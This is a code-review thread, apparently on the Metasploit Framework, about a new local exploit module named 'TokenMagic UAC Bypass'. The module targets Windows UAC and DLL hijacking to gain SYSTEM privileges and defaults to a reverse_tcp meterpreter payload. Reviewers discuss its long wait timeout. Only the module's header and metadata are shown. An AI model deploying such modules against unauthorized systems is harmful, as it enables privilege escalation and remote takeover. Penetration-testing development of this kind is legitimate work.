modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,228 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE # Needed for generate_payload_dll
+  include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::ReflectiveDLLInjection
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Windows::Powershell
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TokenMagic UAC Bypass',
+        'Description' => %q{
+          This module leverages a UAC bypass in order to spawn process with system level privileges or abuse a DLL
+          hijacking vulnerability in order to gain SYSTEM level privileges. Windows 7 through to Windows 10 1803
+          are affected.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'James Forshaw', # Research
+            'Ruben Boonen (@FuzzySec)', # PoC
+            'bwatters-r7', # msf module
+            'jheysel-r7' # msf module
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' =>
+          [
+            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2017-05-25',
+        'References' =>
+          [
+            ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
+            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
+          ],
+        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+            'WfsDelay' => 900
```

Comment:
What was the reason for this long timeout?

Reply:
The System Orchestrator service which loads the overwritten takes some time to trigger. More info can be found in the original module the trigger code was taken from:
https://github.com/jheysel-r7/metasploit-framework/blob/b4e2599921887e12a4da0dfb8be7db7ad2b4413b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md#L189

Reply:
If that's the case, it's a good idea to warn the user why the exploit "hangs."

Reply:
And you can interpolate `wfs_delay` in the message, too.

Reply:
Added an explanation for the hang in the module's `method` argument description.